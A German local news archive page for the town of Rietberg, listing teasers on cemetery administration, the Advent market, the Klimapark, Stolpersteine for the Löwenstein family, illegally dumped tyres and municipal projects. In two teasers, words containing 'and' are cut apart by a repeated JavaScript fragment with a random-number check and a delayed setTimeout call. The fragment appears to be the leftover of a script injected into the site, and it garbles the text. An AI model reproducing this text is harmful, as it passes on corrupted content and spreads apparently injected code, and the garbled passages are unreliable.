Category Archives: Rietberg

Friedhöfe in Rietberg nun städtische Angelegenheit

Gut vorbereitet ist die Stadt Rietberg auf ihre neue Aufgabe, die sie offiziell mit Beginn des neuen Jahres übernimmt: die Verwaltung der Friedhöfe in Rietberg und Bokel. Dafür wurden Mitarbeiter geschult und in einer neuen Abteilung zusammengeführt. Denn wenn nahe Angehörige, Ehepartner oder gar Kinder sterben, stehen einerseits die qualifizierten Bestattungsunternehmen den Hinterbliebenen hilfreich zur

Adventsmarkt lockt in die Rietberger Altstadt

Der Rietberger Adventsmarkt im Schatten der Pfarrkirche ist längst kein Geheimtipp mehr. Die gemütliche Budenstadt erfreut sich seit Jahren großer Beliebtheit – nicht nur bei den Rietbergern. Wer sich auf angenehme Art und Weise in Weihnachtsstimmung versetzen lassen möchte, sollte sich von Mittwoch bis Sonntag, 11. bis 15. Dezember, nichts vornehmen. Bei der 32. Auflage

Stadt erwägt Kauf der Gaststätte Blomberg

Die Immobilie Rathausstraße 45 ist vielen Rietbergern als Gaststätte Blomberg bekannt. Die Stadt Rietberg beabsichtigt jetzt, dieses Haus zu kaufen, und zwar, indem sie von ihrem Vorkaufsrecht Gebrauch macht. Der Grundstücksausschuss hat gestern darüber beraten und der Stadt empfohlen, die Immobilie zu erwerben. Das letzte Wort hat der Stadtrat, er tagt im Rahmen einer öffentlichen

Neue Perspektiven für das Klimapark-Areal

Er war damals als Vorzeigeprojekt seiner Zeit deutlich voraus: der Rietberger Klimapark. Schon zehn Jahre bevor unter dem Motto „Fridays for Future“ die Schüler auf die Straße gehen, ist auf einem Teil des Landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andesgartenschaugeländes der Klimapark entstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden. Die Grundidee:

Sichtbare Zeichen grausamer Schicksale

Sie sind ein deutlich sichtbares Zeichen des Erinnerns, die Stolpersteine des Künstlers Gunter Demnig. Mit ihrer gold-glänzenden Oberfläche fallen sie im Einheitsgrau des Straßenpflasters besonders auf. Elf Exemplare sind am Mittwoch in Rietberg verlegt worden – in Gedenken an Mitglieder der jüdischen Familie Löwenstein, die einst in Rietberg gelebt hat. „Heute ist der Weg das

Stolpersteine erinnern an Familie Löwenstein

Sein Name wird stets in einem Atemzug mit der Aktion genannt, die er erfunden hat: Gunter Demnig. Der Künstler ist bekannt für seine Stolpersteine, die er in Deutschlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and und in vielen andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen Ländern verlegt. Die kleinen, in den Boden

300 Reifen einfach in der Natur abgeladen

Es ist nicht nur Umweltverschmutzung, es ist auch illegal und es kostet die Allgemeinheit viel Geld: die „Entsorgung“ von Altautoreifen in der Natur. Etwa 100 Exemplare sind in diesen Tagen am Birkendamm in Rietberg gefunden worden, am Montag weitere im Bereich Feldkamp in Mastholte. Seit März liegen somit vier Fälle dieser Art auf Rietberger Stadtgebiet

Zaun ist fertig – Hunde dürfen laufen

Rietbergs neue Hundewiese am Tiergartenweg nimmt Formen an. Ab Ende dieser Woche kann die dann eingezäunte Freilauffläche für Hunde genutzt werden. Rund 20.000 Euro lässt sich die Stadt Rietberg diese Wiese, die alle Bürger unkompliziert nutzen können, kosten. Mitte dieser Woche ist die rund 3000 Quadratmeter große Fläche eingezäunt worden. Ein Bereich wurde zum Abstellen

Pläne zur Umgestaltung Rathausstraße präsentiert

Etwa 40 Interessenten sind der Einladung der Stadtverwaltung gefolgt und haben sich jetzt die aktuellen Pläne für die Umgestaltung eines Teils der Rathausstraße erläutern lassen. Im Ratssaal des Alten Progymnasiums präsentierte Ralf Düspohl vom Büro Röver das Projekt, das eine Veränderung des Fahrbahnbereichs auf Höhe des Historischen Rathauses vorsieht. Demnach wird die Fahrbahn der Rathausstraße

Früher eine Apotheke, heute ein Denkmal

Die Adresse lautet Rathausstraße 16. Ab sofort gibt es aber eine weitere Zahl, die etwas über die ehemalige Rotgerische Apotheke aussagt, und das ist die Nummer 76. Denn das imposante Gebäude gegenüber der Bäckerei Lange ist das 76. Denkmal in Rietbergs Historischem Stadtkern. Am Donnerstag konnte Immobilienbesitzer Dr. Horst-Detlef Göbel die bronzene Plakette entgegen nehmen,